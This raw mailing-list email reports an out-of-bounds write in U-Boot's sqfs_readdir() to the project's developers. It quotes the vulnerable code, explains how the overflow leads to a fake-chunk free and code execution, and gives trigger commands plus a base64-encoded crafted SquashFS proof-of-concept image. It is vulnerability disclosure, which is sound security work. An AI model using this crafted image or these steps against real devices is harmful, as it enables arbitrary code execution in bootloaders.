From mboxrd@z Thu Jan  1 00:00:00 1970
Return-Path: <u-boot-bounces@lists.denx.de>
X-Spam-Checker-Version: SpamAssassin 3.4.0 (2014-02-07) on
	aws-us-west-2-korg-lkml-1.web.codeaurora.org
Received: from phobos.denx.de (phobos.denx.de [85.214.62.61])
	(using TLSv1.2 with cipher ECDHE-RSA-AES128-GCM-SHA256 (128/128 bits))
	(No client certificate requested)
	by smtp.lore.kernel.org (Postfix) with ESMTPS id 5ADE5C433F5
	for <u-boot@archiver.kernel.org>; Thu, 26 May 2022 08:28:27 +0000 (UTC)
Received: from h2850616.stratoserver.net (localhost [IPv6:::1])
	by phobos.denx.de (Postfix) with ESMTP id 7C78883EFE;
	Thu, 26 May 2022 10:28:25 +0200 (CEST)
Authentication-Results: phobos.denx.de; dmarc=fail (p=none dis=none) header.from=gmail.com
Authentication-Results: phobos.denx.de; spf=pass smtp.mailfrom=u-boot-bounces@lists.denx.de
Authentication-Results: phobos.denx.de;
	dkim=fail reason="signature verification failed" (2048-bit key; unprotected) header.d=gmail.com header.i=@gmail.com header.b="Kph90o9d";
	dkim-atps=neutral
Received: by phobos.denx.de (Postfix, from userid 109)
 id 9B57F842C4; Thu, 26 May 2022 10:28:23 +0200 (CEST)
Received: from mail-qv1-xf43.google.com (mail-qv1-xf43.google.com
 [IPv6:2607:f8b0:4864:20::f43])
 (using TLSv1.3 with cipher TLS_AES_128_GCM_SHA256 (128/128 bits))
 (No client certificate requested)
 by phobos.denx.de (Postfix) with ESMTPS id 7963C83E68
 for <u-boot@lists.denx.de>; Thu, 26 May 2022 10:28:20 +0200 (CEST)
Authentication-Results: phobos.denx.de;
 dmarc=pass (p=none dis=none) header.from=gmail.com
Authentication-Results: phobos.denx.de;
 spf=pass smtp.mailfrom=jc.w4ng@gmail.com
Received: by mail-qv1-xf43.google.com with SMTP id e2so1094198qvq.13
 for <u-boot@lists.denx.de>; Thu, 26 May 2022 01:28:20 -0700 (PDT)
DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=20210112;
 h=mime-version:from:date:message-id:subject:to;
 bh=3esOta1SjTrYfuclunQ0LNKO5kat0ohsCKLZ3uVQ44g=;
 b=Kph90o9dF7UK0eeppBVUBedLjrLj8X3JMP4yIs7ykJaIhyiv82yEIR+Uwe3LTLlqfc
 RCYzVm4loXQFh5iCpovH/0j4f/+2Rkd3ynCl8KX3JII6MIRzBFOID0pmYJA+v3dbf/b1
 WSswaRUnVvrM8+OogsL8f8vH+a4fdg+e5m6/byP5o0MX/5wiax3kijQk2nSePFRVCwSi
 aI2ZiaM6edOUa3Ekqt6V9Dn+dINyravBgfqNDGuxKxII+1/E6RY8LxL92sJgmZknIuXK
 WY4lLQV0Ve8q70PU/APl+rPLs1fSf0hLiwcfF93CobKc5mRojaSX3RUpQEKfbGJm3rYZ
 wiww==
X-Google-DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed;
 d=1e100.net; s=20210112;
 h=x-gm-message-state:mime-version:from:date:message-id:subject:to;
 bh=3esOta1SjTrYfuclunQ0LNKO5kat0ohsCKLZ3uVQ44g=;
 b=XSF8d724OXSPzGkiYBBKiSIJZTqs5zca/przlSj+SG7qR4v+eNOMwc++WMCIW7nbmh
 xQZ8gsteAl62DVJCpoMiS91AKuXQ+OpQ6qxkT1GEEPnsUO5Jth9BRl2sq7QUjWCv8XXq
 3tb75SQMqOCsoO3WVOqcwhPYKRviJwv9Uga3K7tyl35EkJmRGtQaZG7Ri+jjcVWslVVc
 UHfZcPBORA+OJlB7IvixqKtQxzRMYFDSJroBXg0cVhuwFrPonDtUtVJ/XaxeuP74ZmwQ
 fpSt67JuVhrusG6UA4dNEftXhMA3hiJQjENjEbbdv+thiWT2CavKsEeqavag4UCGYp7P
 j07A==
X-Gm-Message-State: AOAM531QNeMYh0GZIWgxFepfFzOF+PTZuDzQLEz3lTrAV89mXHYlCXdz
 R3GZ1gpxhlZ0a0OSjw+XGiIjCcO+xNc2tn0en/+Nw/1P2bekng==
X-Google-Smtp-Source: ABdhPJxs1kjizJlGaA6n0B81bD+QEO0xEWwzfCtKKi1kx7X6UM4wRyQ7647rSMAVKh618eOk1+KEw2imKKjiI1+WpnI=
X-Received: by 2002:a05:6214:230a:b0:461:e824:46fa with SMTP id
 gc10-20020a056214230a00b00461e82446famr29226638qvb.30.1653553698901; Thu, 26
 May 2022 01:28:18 -0700 (PDT)
MIME-Version: 1.0
From: Jincheng Wang <jc.w4ng@gmail.com>
Date: Thu, 26 May 2022 16:28:07 +0800
Message-ID: <CALO=DHFB+yBoXxVr5KcsK0iFdg+e7ywko4-e+72kjbcS8JBfPw@mail.gmail.com>
Subject: Out of bounds write vulnerability in the sqfs_readdir() function
To: u-boot@lists.denx.de
Content-Type: multipart/mixed; boundary="000000000000d7838505dfe5f8e1"
X-Content-Filtered-By: Mailman/MimeDel 2.1.39
X-BeenThere: u-boot@lists.denx.de
X-Mailman-Version: 2.1.39
Precedence: list
List-Id: U-Boot discussion <u-boot.lists.denx.de>
List-Unsubscribe: <https://lists.denx.de/options/u-boot>,
 <mailto:u-boot-request@lists.denx.de?subject=unsubscribe>
List-Archive: <https://lists.denx.de/pipermail/u-boot/>
List-Post: <mailto:u-boot@lists.denx.de>
List-Help: <mailto:u-boot-request@lists.denx.de?subject=help>
List-Subscribe: <https://lists.denx.de/listinfo/u-boot>,
 <mailto:u-boot-request@lists.denx.de?subject=subscribe>
Errors-To: u-boot-bounces@lists.denx.de
Sender: "U-Boot" <u-boot-bounces@lists.denx.de>
X-Virus-Scanned: clamav-milter 0.103.5 at phobos.denx.de
X-Virus-Status: Clean

--000000000000d7838505dfe5f8e1
Content-Type: text/plain; charset="UTF-8"

Hello u-boot list,

I found the sqfs_readdir() function is vulnerable to Out-of-Bound write,
which will cause arbitrary code execution.

```
int sqfs_readdir(struct fs_dir_stream *fs_dirs, struct fs_dirent **dentp)
{
......
/* Set entry name */

strncpy(dent->name, dirs->entry->name, dirs->entry->name_size + 1);
dent->name[dirs->entry->name_size + 1] = '\0';

offset = dirs->entry->name_size + 1 + SQFS_ENTRY_BASE_LENGTH;
dirs->entry_count--;
.......
}


struct squashfs_dir_stream {
struct fs_dir_stream fs_dirs;
struct fs_dirent dentp;
size_t size;
int entry_count;
struct squashfs_directory_header *dir_header;
struct squashfs_directory_entry *entry;
......
};


static int sqfs_search_dir(struct squashfs_dir_stream *dirs, char
**token_list,
  int token_count, u32 *m_list, int m_count)
{
......
while (!sqfs_readdir(dirsp, &dent)) {
ret = strcmp(dent->name, token_list[j]);
if (!ret)
break;
free(dirs->entry);
dirs->entry = NULL;
}
......
}

```

The sqfs_readdir() function  use strncpy to  set entry name, while the type
of dirs->entry->name_size is defined as "u16" in the struct
squashfs_directory_entry
and dent->name
is defined as "char[256]" in the struct fs_dirent.

We can overwrite *dirs_header and *entry in the struct squashfs_dir_stream,
so that  we can use the sqfs_search_dir() function to free a fake
chunk which causes arbitrary code execution.
You can see the Poc in the attachment.

     host bind 0 test4.sqfs
     ls host 0 /dirs

--000000000000d7838505dfe5f8e1
Content-Type: application/octet-stream; name="test4.sqfs"
Content-Disposition: attachment; filename="test4.sqfs"
Content-Transfer-Encoding: base64
Content-ID: <f_l3mqzeqk0>
X-Attachment-Id: f_l3mqzeqk0

aHNxcwYAAACUomtiAAACAAEAAAABABEAywEBAAQAAACgAAAAAAAAAMQFAAAAAAAAvAUAAAAAAAD/
/////////2sAAAAAAAAALQEAAAAAAAB0BQAAAAAAAK4FAAAAAAAAMTIzNDU2Nzg5MArAgAEA/QEA
AAAA6aFrYgEAAAAAAAAAAgAAAAMAAAAGAAAAAQD9AQAAAACloWtiAgAAAAAAAAACAAAAAwAAAAYA
AAABAP0BAAAAAMyha2IDAAAAAAAAAAIAAAADAAAABgAAAAEA/QEAAAAAGaJrYgQAAAAAAAAAAgAA
AAMAAAAGAAAAAgC0AQAAAAAyomtiBQAAAAAAAAAAAAAAAAAAAAsAAAABAP0BAAAAAB+ia2IGAAAA
AAAAAAYAAAA2BAAABwAAADOEBAAAAAAAAAABAAAAAAAAAAEAHwFBQUFBQUFBQUFBQUFBQUFBQUFB
QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB
QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB
QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB
QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB
QUFBQUFBQUFBISEhISEhISEBAQEBAgICAmRpcl9oZWFkZGlyZW50cnlCQkJCQkJCQkJCQkJCQkJC
QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC
QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC
QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC
QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQAACAAEA/gBDQ0NDQ0ND
Q0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0ND
Q0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0ND
Q0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0ND
Q0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0ND
Q0NDQ0NDQ0NDQ0NDQ0NDQ0NDQ0NgAAMAAQD9AERERERERERERERERERERERERERERERERERERERE
RERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERE
RERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERE
RERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERERE
REREREREREREREREREREREREREREREREREREREREREREREREREREREREREREREREREREREREgAAE
AAIABABoZWxsbxCAYAAAAAAAAAALAAABAAAAAGIFAAAAAAAAMIAAAAAAAAAAACAAAAAAAAAAQAAA
AAAAAABgAAAAAAAAAIAAAAAAAAAAoAAAAAAAAAB8BQAAAAAAAASA6AMAALYFAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA==
--000000000000d7838505dfe5f8e1--